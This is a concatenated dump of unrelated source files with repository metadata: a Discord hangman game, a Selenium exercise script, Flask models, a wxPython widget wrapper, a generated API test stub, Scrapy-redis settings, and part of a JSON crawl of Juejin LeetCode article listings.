self.p_usadas_fallo = self.p_usadas_fallo + letra + " - "
self.desaciertos += 1
resultado = "Lo siento!!! → " + str(self.palabra_adivinar) + " | Aciertos: " + str(self.aciertos) + " | Desaciertos: " + str(self.desaciertos) + " - " + str(self.p_usadas_fallo)
elif contador > 0:
self.aciertos += 1
resultado = "Bien hecho!!! → " + str(self.palabra_adivinar) + " | Aciertos: " + str(self.aciertos) + " | Desaciertos: " + str(self.desaciertos) + " - " + str(self.p_usadas_fallo)
return resultado
def palabra_acierto(self, letra):
palabra_aux = self.palabra_adivinar
palabra_sin_adivinar = ""
for i in range(len(self.palabra_adivinar)):
if self.palabra[i] == letra:
palabra_sin_adivinar += letra
elif palabra_aux[i] != "?":
palabra_sin_adivinar += palabra_aux[i]
else:
palabra_sin_adivinar += "?"
return palabra_sin_adivinar
def comprobar_victoria(self):
return self.palabra == self.palabra_adivinar or self.desaciertos >= 8
def ganar_o_perder(self):
if self.palabra == self.palabra_adivinar:
resultado = 'Felicidades <@' + str(self.jugador) +'> ganaste el juego'
self.reiniciar_valores()
elif self.desaciertos >= 8:
resultado = 'Lo lamento <@' + str(self.jugador) + '> pero perdiste'
self.reiniciar_valores()
return resultado | [
"bogadofedericoezequiel@gmail.com"
] | bogadofedericoezequiel@gmail.com |
f8fdb29e897fa128d24ffc589aefca92f2b0bd24 | a7b1f827def23135663625426d11b1c57b02fdd9 | /2_3_alerts/2_3_step3_alert1.py | 3de4e106a245dec60b5ae04c2cc451e6e8abc2ab | [] | no_license | Michael-uniq/selenium_stepik_learn | e6421221b0cfc7d469a0fcc12635cb44369e6d35 | 5ba6762aaeb7cdf5f2ad43db4660b0eff9b48992 | refs/heads/master | 2021-06-18T09:39:12.348198 | 2019-10-05T19:00:52 | 2019-10-05T19:00:52 | 212,150,595 | 0 | 0 | null | 2021-06-02T00:30:03 | 2019-10-01T16:54:53 | Python | UTF-8 | Python | false | false | 887 | py | from selenium import webdriver
import time
from utils import print_answer, calc
from selenium.webdriver.common.by import By
link = "http://suninjuly.github.io/alert_accept.html"
browser = webdriver.Chrome()
browser.get(link)
try:
btn = browser.find_element_by_class_name('btn')
btn.click()
print_answer(browser)
x_el = browser.find_element(By.ID, 'input_value')
x = x_el.text
# Ваш код, который заполняет обязательные поля
browser.find_element_by_id("answer").send_keys(calc(x))
# Отправляем заполненную форму
button = browser.find_element_by_class_name("btn")
button.click()
# Проверяем, что смогли зарегистрироваться
# ждем загрузки страницы
time.sleep(1)
print_answer(browser)
finally:
browser.quit()
| [
"michael.co@ya.ru"
] | michael.co@ya.ru |
0785c4045308368283d3ef833fe22fa1dd6852ba | 82097740587821af4af9b41ba9ae14638d20eb69 | /Flask/flaskproject/models.py | 156ead3900d1fc71edca30e0dac340333c6c314e | [] | no_license | dasdasda21/flask | d592c8fa90ea90bdf9adb38b6b0d8b6d8b621967 | 207e863209f670bc8360084fed2e038db727c10b | refs/heads/master | 2020-07-30T12:48:15.417540 | 2019-10-07T13:12:42 | 2019-10-07T13:12:42 | 210,239,723 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | from main import models
class BaseModel(models.Model):
__abstract__ =True
id = models.Column(models.Integer,primary_key=True,autoincrement=True)
def save(self):
db = models.session()
db.add(self)
db.commit()
def delete(self):
db = models.session()
db.delete(self)
db.commit()
class Curriculum(BaseModel):
__tablename__ ="curriculum"
c_id = models.Column(models.String(32))
c_name = models.Column(models.String(32))
c_time = models.Column(models.Date)
class User(BaseModel):
__tablename__ = "user"
user_name = models.Column(models.String(32))
password = models.Column(models.String(32))
email = models.Column(models.String(32))
class Leave(BaseModel):
"""
请假0
批准1
驳回2
销假3
"""
__tablename__ = "leave"
request_id = models.Column(models.Integer) #请假人id
request_name = models.Column(models.String(32))#请假人姓名
request_type = models.Column(models.String(32))#假期类型
request_start_time = models.Column(models.String(32))#起始时间
request_end_time = models.Column(models.String(32))#结束时间
request_description = models.Column(models.Text)#请假事由
request_phone = models.Column(models.String(32))#联系方式
request_status = models.Column(models.String(32))#假条状态
class Picture(BaseModel):
picture = models.Column(models.String(64)) | [
"zhangsan.caom"
] | zhangsan.caom |
8b4c3ac988b0f45270e383cbf96bdd84bb4ef0b3 | c347d18581177f4a1ed460d57f51906b1c1065e5 | /SDK/wxPythonTextfield.py | 1fe4c8390e723a13021b31eb8aac76fd00e984c1 | [] | no_license | mr-huangjian/Python | da2184f51e03c60dd72e392e8afa9f540a9497ef | 7e0a421d922d377270547afbc9029f7627506f2b | refs/heads/master | 2021-06-28T09:01:56.487917 | 2017-09-19T09:57:33 | 2017-09-19T09:57:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 634 | py | # coding: utf-8 python2
# created by mr.huangjian@foxmail.com on 2017/7/1.
import wx
class Textfield(wx.TextCtrl):
def __init__(self, superview, style=0):
wx.TextCtrl.__init__(self, superview, -1, style=style)
def text(self, text):
self.SetLabelText(text)
def gettext(self):
return self.GetValue()
def origin(self, origin):
self.SetPosition(origin)
def size(self, size):
self.SetSize(size)
def font(self, font):
self.SetFont(wx.Font(font, wx.ROMAN, wx.NORMAL, wx.NORMAL))
def textcolor(self, textcolor):
self.SetForegroundColour(textcolor)
| [
"mr.huangjian@foxmail.com"
] | mr.huangjian@foxmail.com |
8ebd576a5c0651eb84ceff4de6e7daa1b0798574 | 5ec06dab1409d790496ce082dacb321392b32fe9 | /clients/python/generated/test/test_com_adobe_granite_repository_hc_impl_authorizable_node_name_health_check_properties.py | 3a604357918c8edc66ecdea80b46d7424d41f966 | [
"Apache-2.0"
] | permissive | shinesolutions/swagger-aem-osgi | e9d2385f44bee70e5bbdc0d577e99a9f2525266f | c2f6e076971d2592c1cbd3f70695c679e807396b | refs/heads/master | 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 | Apache-2.0 | 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null | UTF-8 | Python | false | false | 1,487 | py | # coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.com_adobe_granite_repository_hc_impl_authorizable_node_name_health_check_properties import ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties(unittest.TestCase):
"""ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties(self):
"""Test ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.com_adobe_granite_repository_hc_impl_authorizable_node_name_health_check_properties.ComAdobeGraniteRepositoryHcImplAuthorizableNodeNameHealthCheckProperties() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"michael.bloch@shinesolutions.com"
] | michael.bloch@shinesolutions.com |
061fe85a1d6cca2865862da0c133cc36a11f4ecb | 4f6c5a21840f630eab748fa64f79f3d15e33315a | /upload/1386125709792681985/news/master/master/settings.py | 29039ffdeae32373f1ae85b4d7954455d440d93e | [] | no_license | taozi926494/collectplatform | 802af97f0fcb0c8f670e616011e7e2db10edda82 | fb9bc32a99335340cb4e11f18a6e9d5e1effb17a | refs/heads/master | 2023-04-15T00:38:36.869680 | 2021-04-28T02:35:39 | 2021-04-28T02:35:39 | 357,378,396 | 0 | 4 | null | 2021-04-28T02:35:40 | 2021-04-13T00:36:49 | Java | UTF-8 | Python | false | false | 918 | py | # -*- coding: utf-8 -*-
BOT_NAME = '{{project_name}}'
SPIDER_MODULES = ['{{project_name}}.spiders']
NEWSPIDER_MODULE = '{{project_name}}.spiders'
ROBOTSTXT_OBEY = False
CONCURRENT_REQUESTS = 1
DOWNLOAD_DELAY = 1
DOWNLOADER_MIDDLEWARES = {
# 'master.middlewares.UserAgent': 1,
# 'master.middlewares.MasterDownloaderMiddleware': 543,
}
ITEM_PIPELINES = {
'{{project_name}}.pipelines.__ProjectNamecapitalize__MasterPipeline': 300,
}
# scrapy-redis 配置
REDIS_HOST = '172.16.119.6'
REDIS_PORT = 6379
# 去重类,要使用Bloom Filter请替换DUPEFILTER_CLASS
DUPEFILTER_CLASS = "scrapy_redis_bloomfilter.dupefilter.RFPDupeFilter"
# # 散列函数的个数,默认为6,可以自行修改
BLOOMFILTER_HASH_NUMBER = 6
# # Bloom Filter的bit5数,默认30,2^30 = 10亿位=10亿/8 字节=128MB空间,去重量级1亿
BLOOMFILTER_BIT = 25
SCHEDULER = "scrapy_redis_bloomfilter.scheduler.Scheduler"
| [
"bestfuqiang@163.com"
] | bestfuqiang@163.com |
62ca945793b8ded662bede34c74e0fa6bba7a0dd | 3d7039903da398ae128e43c7d8c9662fda77fbdf | /database/LeetCode/juejin_177.py | 66305002a453b443f0d8c1698db9ad711222a8ac | [] | no_license | ChenYongChang1/spider_study | a9aa22e6ed986193bf546bb567712876c7be5e15 | fe5fbc1a5562ff19c70351303997d3df3af690db | refs/heads/master | 2023-08-05T10:43:11.019178 | 2021-09-18T01:30:22 | 2021-09-18T01:30:22 | 406,727,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,057 | py | {"err_no": 0, "err_msg": "success", "data": [{"article_id": "6998707022577270798", "article_info": {"article_id": "6998707022577270798", "user_id": "3175804198200456", "category_id": "6809637767543259144", "tag_ids": [6809640398105870343, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1c61aeeaab454bf78df10f818e5653f2~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「链表」leetcode 237.删除链表中的节点(简单)", "brief_content": "一、了解题目 附上原题链接:237. 删除链表中的节点 请编写一个函数,使其可以删除某个链表中给定的(非末尾)节点。传入函数的唯一参数为 要被删除的节点 。 示例: 现有一个链表 -- head = ", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1629513492", "mtime": "1629538948", "rtime": "1629524147", "draft_id": "6998705842656641031", "view_count": 68, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00074255, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3175804198200456", "user_name": "清风伴我行", "company": "", "job_title": "", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/91d1e39b3893315e220a6e34a8a0c916~300x300.image", "level": 1, "description": "周一的知识宝库", "followee_count": 1, "follower_count": 1, "post_article_count": 23, "digg_article_count": 0, "got_digg_count": 10, "got_view_count": 1082, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 20, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6998707022577270798, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6844903889771167752", "article_info": {"article_id": "6844903889771167752", "user_id": "3403743728515246", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 攻略 - 2019 年 7 月上半月汇总(55 题攻略)", "brief_content": "自 2019-05-16 开始,jsliang 每天折腾一道及以上 LeetCode 题目,并将其解题思路记录成文章,发布到 GitHub 和 微信公众号。 2019/08/15 前。LeetCode 简单难度题目 - 完成 100 道简单 LeetCode 题目的题解。 20…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1563171733", "mtime": "1604316971", "rtime": "1563171733", "draft_id": "6845076375024435208", "view_count": 3858, "collect_count": 75, "digg_count": 68, "comment_count": 11, "hot_index": 271, "is_hot": 0, "rank_index": 0.00074102, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3403743728515246", "user_name": "jsliang", "company": "金山办公软件", "job_title": "联系方式看个人主页", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/fae2936a68be7eac2c5477f18a875fb2~300x300.image", "level": 6, "description": "不折腾的前端,跟咸鱼有什么区别", "followee_count": 20, "follower_count": 15078, "post_article_count": 108, "digg_article_count": 512, "got_digg_count": 13744, "got_view_count": 814343, "post_shortmsg_count": 12, "digg_shortmsg_count": 12, "isfollowed": false, "favorable_author": 1, "power": 21911, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 6844903889771167752, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6994069448957116424", "article_info": {"article_id": "6994069448957116424", "user_id": "3790771823848935", "category_id": "6809637767543259144", "tag_ids": [6809640398105870343, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p1-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/bda05ced978d450083bae9b3bdc5946d~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "前端Leetcode系列|13. 罗马数字转整数", "brief_content": "今天来和小伙伴们一起打卡力扣第13题:罗马数字转整数。 一、题目描述 罗马数字包含以下七种字符: I, V, X, L例如, 罗马数字 2 写做 II ,即为两个并列的 1。12 写做 XII ,即为", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628433831", "mtime": "1628504086", "rtime": "1628480884", "draft_id": "6994065730035515400", "view_count": 92, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00073858, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3790771823848935", "user_name": "芒果啊", "company": "x95333@sohu.com", "job_title": "前端ing", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/11/19/16e8255bc0f64b7f~tplv-t2oaga2asx-image.image", "level": 2, "description": "Endless knowledge, endless learning", "followee_count": 17, "follower_count": 10, "post_article_count": 34, "digg_article_count": 57, "got_digg_count": 81, "got_view_count": 6060, "post_shortmsg_count": 16, "digg_shortmsg_count": 7, "isfollowed": false, "favorable_author": 0, "power": 141, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6994069448957116424, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6936441872113991693", "article_info": {"article_id": "6936441872113991693", "user_id": "2462537381852910", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "[leetCode 94.二叉树的中序遍历]|刷题打卡", "brief_content": "给定一个二叉树的根节点 root ,返回它的 中序 遍历。 使用递归解题是该题最简单的解法,我写一个函数,传入需要遍历的二叉树的根节点,函数中判断root是否为空结点,是就直接返回一个空数组[],不是空结点就进行操作。操作中分为三部分,第一部分使其定位到最左下的结点(直到空),…", "is_english": 0, "is_original": 1, "user_index": 7.388384878619027, "original_type": 0, "original_author": "", "content": "", "ctime": "1615016312", "mtime": "1615021308", "rtime": "1615021308", "draft_id": "6936372347716780046", "view_count": 298, "collect_count": 1, "digg_count": 17, "comment_count": 4, "hot_index": 35, "is_hot": 0, "rank_index": 0.00072919, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2462537381852910", "user_name": "蟹黄同学", "company": "", "job_title": "前端 @ 未来全栈工程师", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/1548bec913c0a1720de68d7c26fe1ded~300x300.image", "level": 3, "description": "蟹黄吃到饱,前端搞的好,一个梦想能吃蟹黄吃到饱的前端程序员", "followee_count": 48, "follower_count": 238, "post_article_count": 12, "digg_article_count": 171, "got_digg_count": 1679, "got_view_count": 42714, "post_shortmsg_count": 3, "digg_shortmsg_count": 3, "isfollowed": false, "favorable_author": 0, "power": 2108, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6936441872113991693, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6989789225268805639", "article_info": {"article_id": "6989789225268805639", "user_id": "3773179638847261", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/592e86e445464eef8453a6cb02a4f9ef~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "算法(leetode,附思维导图 + 全部解法)300题之(3)无重复字符的最长子串", "brief_content": "标题:算法(leetode,附思维导图 + 全部解法)300题之(3)无重复字符的最长子串 一 题目描述 二 解法总览(思维导图) 三 全部解法 1 方案1 1)代码: 2 方案2 1)代码: 3 方", "is_english": 0, "is_original": 1, "user_index": 2.089693646737103, "original_type": 0, "original_author": "", "content": "", "ctime": "1627437136", "mtime": "1627443036", "rtime": "1627443036", "draft_id": "6989787166981242894", "view_count": 92, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00072567, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3773179638847261", "user_name": "码农三少", "company": "百度", "job_title": "百度前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/8301f5ea3bfc02a837cd4d1d7eefd0bd~300x300.image", "level": 1, "description": "前端(主攻数据可视化);半年内实现了个人公众号从0到5.8K+的增长;数独", "followee_count": 49, "follower_count": 7, "post_article_count": 24, "digg_article_count": 17, "got_digg_count": 33, "got_view_count": 2106, "post_shortmsg_count": 0, "digg_shortmsg_count": 4, "isfollowed": false, "favorable_author": 0, "power": 54, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6989789225268805639, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "7000932485362090014", "article_info": {"article_id": "7000932485362090014", "user_id": "3175804198200456", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/6d7ad6f2fb614e8285a4bd3bbd6c366f~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「字符串」leetcode 9.判断是否是回文数(简单)", "brief_content": "一、了解题目 附上原题链接:9. 回文数 给你一个整数 x ,如果 x 是一个回文整数,返回 true ;否则,返回 false 。 回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。例如", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1630031637", "mtime": "1630056524", "rtime": "1630056524", "draft_id": "6999904991586549768", "view_count": 59, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 2, "is_hot": 0, "rank_index": 0.0007145, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3175804198200456", "user_name": "清风伴我行", "company": "", "job_title": "", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/91d1e39b3893315e220a6e34a8a0c916~300x300.image", "level": 1, "description": "周一的知识宝库", "followee_count": 1, "follower_count": 1, "post_article_count": 23, "digg_article_count": 0, "got_digg_count": 10, "got_view_count": 1082, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 20, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 7000932485362090014, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6994435150604042247", "article_info": {"article_id": "6994435150604042247", "user_id": "1371820633892071", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "算法题-顺时针打印矩阵", "brief_content": "题目描述 输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字。 分析:矩阵可以用二维数组来模拟。 示例 : 题解 方法一:模拟打印", "is_english": 0, "is_original": 1, "user_index": 1.526738543039035, "original_type": 0, "original_author": "", "content": "", "ctime": "1628518839", "mtime": "1628565734", "rtime": "1628565734", "draft_id": "6994434429179396109", "view_count": 53, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00069257, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1371820633892071", "user_name": "山人Ll", "company": "", "job_title": "前端", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/19a42ba89b6e00ce91d75457218e78ae~300x300.image", "level": 2, "description": "", "followee_count": 8, "follower_count": 4, 